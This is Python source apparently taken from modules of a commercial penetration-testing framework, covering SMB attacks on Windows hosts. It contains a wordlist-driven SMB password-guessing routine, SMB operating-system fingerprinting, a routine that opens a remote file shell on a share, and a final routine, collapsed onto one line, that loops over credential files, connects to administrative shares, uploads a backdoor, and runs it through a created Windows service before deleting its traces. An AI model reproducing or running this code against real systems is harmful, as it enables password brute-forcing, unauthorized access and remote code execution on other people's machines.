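def test(self):
    """Check that the configured credentials can open the target share.

    Opens one SMB session to ``self.host:self.port`` as
    ``self.domain\\self.user`` and issues a TreeConnect_AndX for the share
    named by ``self.filename`` (the argument that holds the share name in
    this module).  Unlike ``run`` this never spawns a shell; it only
    reports whether the credentials work.

    Returns:
        1 when both the session setup and the tree connect succeed,
        0 otherwise.
    """
    self.getargs()
    self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %
                 (NAME, self.host, self.port, self.covertness))
    # Say whether a password was supplied, never what it is: module logs
    # are persisted and shared more widely than the credential itself.
    self.log("Using domain=%s user=%s, password %s" %
             (self.domain, self.user,
              "<set>" if self.password else "<empty>"))

    smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
    smbobj.covertness = self.covertness
    smbobj.username = self.user
    smbobj.password = self.password
    smbobj.domain = self.domain

    if not smbobj.connect():
        self.log("Could not connect to remote host: %s" % smbobj.errormsg)
        return 0

    self.log("Trying treeconnect_AndX on share %s" % self.filename)
    try:
        if not smbobj.treeconnect(self.filename):
            self.log("Failed to connect to share!")
            return 0
        self.log("Connected to share %s" % self.filename)
        return 1
    finally:
        # Close the session on every exit path; previously the socket was
        # leaked whenever the tree connect failed.
        smbobj.close()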
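def run(self):
    """Guess the SMB password of ``self.user`` against ``self.share``.

    Candidates are tried in this order: the empty password, the username
    itself, then every line of the wordlist ``self.filename``.  Each guess
    uses a fresh SMB session to ``self.host:self.port``; the first one that
    both authenticates and can TreeConnect to ``self.share`` is reported
    through ``setInfo`` and ends the run.  ``self.state == self.HALT`` is
    checked between guesses so the operator can stop a long wordlist.

    Returns:
        1 when a working password was found; 0 when the wordlist cannot be
        opened, the run is halted, or every candidate fails.
    """
    self.getArgs()
    self.log('%s running against %s:%s covertness: %d' % (NAME, self.host, self.port, self.covertness))
    self.setInfo('%s attacking %s:%s (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness))

    try:
        # Strip only the line terminator: wordlists legitimately contain
        # passwords with leading or trailing blanks.
        with open(self.filename) as wordlist:
            candidates = [line.rstrip('\r\n') for line in wordlist]
    except (IOError, OSError):
        self.log('Failed to open password file %s' % (self.filename))
        return 0

    # Cheapest guesses first: empty password, then username-as-password.
    candidates = ['', self.user] + candidates

    for password in candidates:
        if self.state == self.HALT:
            self.log('Halted')
            return 0

        # Pass the configured port explicitly: previously the connection
        # went to the library default while self.port was logged as the
        # target.
        smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
        smbobj.covertness = self.covertness
        smbobj.username = self.user
        smbobj.password = password
        try:
            if not smbobj.connect():
                self.log('Could not connect to remote host as "%s":"%s"' % (self.user, password))
                continue
            self.log('Trying TreeConnect_AndX on share %s' % self.share)
            if not smbobj.treeconnect(self.share):
                self.log('Failed to connect to share as "%s":"%s"!' % (self.user, password))
                continue
        finally:
            # One session per guess: release it whether the guess failed or
            # succeeded so a long wordlist cannot exhaust sockets.  A
            # connect that never obtained a socket may have nothing to
            # close, hence the best-effort wrapper.
            try:
                smbobj.close()
            except Exception:
                pass

        self.log('Connected to share %s with "%s":"%s"' % (self.share, self.user, password))
        self.log('Done with exploit')
        self.setInfo('%s attacking %s:%s (Covertness:%d) - done (found:%s:%s)' % (NAME, self.host, self.port, self.covertness, self.user, password))
        return 1

    self.setInfo('%s attacking %s:%s (Covertness:%d) - done (failed)' % (NAME, self.host, self.port, self.covertness))
    return 0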
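def test(self):
    """Check that ``self.user``/``self.password`` can open ``self.share``.

    Opens a single SMB session to ``self.host:self.port`` and issues a
    TreeConnect_AndX for the share; nothing else is done with the session
    and it is always closed before returning.

    Returns:
        1 when session setup and the tree connect both succeed, 0 otherwise.
    """
    self.getArgs()
    self.log('%s running against %s:%s covertness: %d' % (NAME, self.host, self.port, self.covertness))
    self.setInfo('%s attacking %s:%s (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness))

    # Pass the configured port explicitly so the probe goes where the
    # status line says it does, not to the library default.
    smbobj = msrpc.SMB(self.host, port=self.port, getsock=self)
    smbobj.covertness = self.covertness
    smbobj.username = self.user
    smbobj.password = self.password

    if not smbobj.connect():
        self.log('Could not connect to remote host')
        return 0

    try:
        self.log('Trying treeconnect_AndX on share %s' % (self.share))
        if not smbobj.treeconnect(self.share):
            self.log('Failed to connect to share!')
            return 0
        self.log('Connected to share %s' % (self.share))
        return 1
    finally:
        # Close on every exit path; the failed-tree-connect path used to
        # leak the session.
        smbobj.close()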
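def do_smb(self):
    """Fingerprint the target OS from its SMB native OS / LanMan strings.

    Probes port 139 and then 445.  The ``os``, ``lanman``, ``domain`` and
    ``server`` strings are read from the SMB object whether or not
    ``connect()`` reported success (presumably because the session-setup
    response carries them even for a rejected logon; the return value was
    never checked in the original either).  The first port that yields a
    lanman string other than 'unknown' is recorded on ``self.target`` as
    Lanman / SMBDomain / SMBServer knowledge and probing stops there.

    Returns:
        A ``canvasos`` object for the guessed OS, or None when the banner
        matched nothing below.  A Windows banner that matches none of the
        listed version strings yields a 'Windows' result with no version.
    """
    result = None
    self.log("SMB DETECT: Doing SMB OS Detection")

    os_name = 'unknown'
    lanman = 'unknown'
    for port in [139, 445]:
        smbobj = msrpc.SMB(self.host, port=port, getsock=self)
        smbobj.covertness = self.covertness
        smbobj.username = self.user
        smbobj.password = self.password
        smbobj.connect()  # result deliberately ignored, see docstring
        try:
            os_name = smbobj.os
            lanman = smbobj.lanman
            self.log('SMB DETECT: SMB OS Detection (port=%d) returned %s' % (port, os_name))
            if lanman.lower() != 'unknown':
                self.log("SMB DETECT: Adding lanman knowledge: %s" % lanman)
                self.target.add_knowledge("Lanman", lanman, 100)
                self.log("SMB DETECT: Adding domain knowledge: %s" % smbobj.domain)
                self.target.add_knowledge("SMBDomain", smbobj.domain, 100)
                self.log("SMB DETECT: Adding server knowledge: %s" % smbobj.server)
                self.target.add_knowledge("SMBServer", smbobj.server, 100)
                break
        finally:
            # Each probe opened its own session; previously none was closed.
            # Best effort: a failed connect may have left no socket.
            try:
                smbobj.close()
            except Exception:
                pass

    os_upper = os_name.upper()
    lanman_upper = lanman.upper()

    if 'UNIX' in os_upper:
        # Only SuSE is positively identified from the lanman string; a
        # generic Samba banner is left as None rather than guessed at.
        if 'SUSE' in lanman_upper:
            result = canvasos.new("Linux")
            result.version = "SuSE"
    elif 'VISTA' in os_upper:
        result = canvasos.new('Windows')
        result.version = 'Vista'
        for subversion in ['Ultimate']:
            if subversion in os_name:
                result.family = subversion
    elif 'LAN MANAGER 4.0' in os_upper:
        result = canvasos.new('Windows')
        result.version = 'NT 4.0'
    elif 'WINDOWS' in os_upper:
        result = canvasos.new('Windows')
        # Order matters: these are substring tests on the raw banner.
        if 'Windows 5.0' in os_name:
            result.version = '2000'
        elif 'Windows 5.1' in os_name:
            result.version = 'XP'
        elif 'Windows .NET 5.2' in os_name:
            result.version = '.NET RC2'
        elif 'Windows NT 4.0' in os_name:
            result.version = 'NT'
        elif 'Windows 4.0' in os_name:
            result.version = '9x'
        elif 'Windows Server 2003' in os_name:
            result.version = '2003'
            if 'Service Pack 1' in os_name:
                result.servicepack.append('SP1')
            elif 'Service Pack 2' in os_name:
                result.servicepack.append('SP2')
            else:
                result.servicepack.append('SP0')

    return result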
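def run(self):
    """Open an SMB session to the target share and attach a VFS shell node.

    Connects to ``self.host:self.port`` as ``self.domain\\self.user`` and
    TreeConnects to the share named by ``self.filename``.  When either step
    fails on a port other than 445 the whole thing is retried once on 445.
    On success a ``VFSNode`` is created under the first node in
    ``self.argsDict["passednodes"]``, an ``smbshell`` is created for it
    (which presumably attaches itself to the node; its return value was
    unused in the original too), and the node is stored in ``self.result``
    and returned.  The SMB session is intentionally left open for the
    shell.

    Returns:
        The new ``VFSNode`` on success, 0 on any failure.
    """
    self.result = []
    self.getargs()
    self.log("%s running against %s:%d covertness: %d" %
             (NAME, self.host, self.port, self.covertness))
    self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %
                 (NAME, self.host, self.port, self.covertness))
    # Say whether a password was supplied, never what it is: module logs
    # are persisted and shared more widely than the credential itself.
    self.log("Using domain=%s user=%s, password %s" %
             (self.domain, self.user,
              "<set>" if self.password else "<empty>"))

    # Resolve the parent node before touching the network so a missing
    # argument fails cleanly instead of raising after a session is open.
    try:
        parentnode = self.argsDict["passednodes"][0]
    except (KeyError, IndexError, TypeError):
        self.log("No parent VFS node passed in argsDict['passednodes']")
        return 0

    # Configured port first, then a single fallback to 445.
    ports = [self.port]
    if self.port != 445:
        ports.append(445)

    smbobj = None
    for port in ports:
        candidate = msrpc.SMB(self.host, port=port, getsock=self)
        candidate.covertness = self.covertness
        candidate.username = self.user
        candidate.password = self.password
        candidate.domain = self.domain

        if not candidate.connect():
            self.log("Could not connect to remote host: %s" % candidate.errormsg)
            if port != ports[-1]:
                self.log("Attempting to try port 445.")
            continue
        self.log("Successfully connected to %s:%d" % (self.host, port))

        self.log("Trying treeconnect_AndX on share %s" % self.filename)
        if candidate.treeconnect(self.filename):
            smbobj = candidate
            break
        # Release this attempt's session before retrying on the next port;
        # previously it was leaked.
        candidate.close()

    if smbobj is None:
        self.log("Failed to connect to share!")
        return 0
    self.log("Connected to share %s" % self.filename)

    if not smbobj.checkdirectory("\\"):
        self.log("Can't check directory on that share. :<")
    else:
        self.log("Checkdirectory \\ passed...")

    node = VFSNode()
    node.parentnode = parentnode
    smbshell(smbobj, node, self.logfunction)

    self.setInfo("%s attacking %s:%d (Covertness:%d) - done" %
                 (NAME, self.host, self.port, self.covertness))
    self.result = [node]
    return node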
def run(self): self.getargs() self.maketrojan() self.log('[D2] %s running against %s:%d covertness: %d' % (NAME, self.host, self.port, self.covertness)) self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - running' % (NAME, self.host, self.port, self.covertness)) listaccount = {} if self.msrpcuser and self.msrpcpassword: listaccount[self.msrpcuser] = self.msrpcpassword if self.credentfile: lines = open(self.credentfile, 'r').readlines() for line in lines: user, passwd = line[:-1].split(':') listaccount[user] = passwd for user, passwd in listaccount.items(): self.msrpcuser = user self.msrpcpassword = passwd self.smbobj = msrpc.SMB(self.host, port=self.port, getsock=self) self.smbobj.covertness = self.covertness self.smbobj.username = self.msrpcuser self.smbobj.password = self.msrpcpassword self.smbobj.domain = self.domain ret = self.smbobj.connect() if not ret: continue self.log('[D2] Using domain=%s user=%s, password=%s' % (self.domain, self.msrpcuser, self.msrpcpassword)) sharelist = ["ADMIN$", "C$", "D$", "E$"] shareenum = self.run_module('shareenum') for share in shareenum: name, desc = str(share).split(':') if name not in sharelist: sharelist.append(name) self.log('[D2] Trying to log into %s file share' % (', '.join(sharelist))) for sharename in sharelist: if not self.connect_to_share(sharename): continue if not self.upload_backdoor(): continue scm = self.create_service(sharename) if scm == None: continue handler = self.open_service(scm) if handler == None: continue self.start_service(handler) time.sleep(10) self.stop_service(handler) self.delete_service(handler) self.CloseServiceHandle(handler) self.CloseServiceHandle(scm) time.sleep(10) os.unlink(self.srcbin) self.delete_backdoor() time.sleep(10) self.myDCE.close() self.smbobj.s.close() self.log('[D2] Done with exploit') self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - done' % (NAME, self.host, self.port, self.covertness)) return 1 self.setInfo('[D2] %s attacking %s:%d (Covertness:%d) - failed' % 
(NAME, self.host, self.port, self.covertness))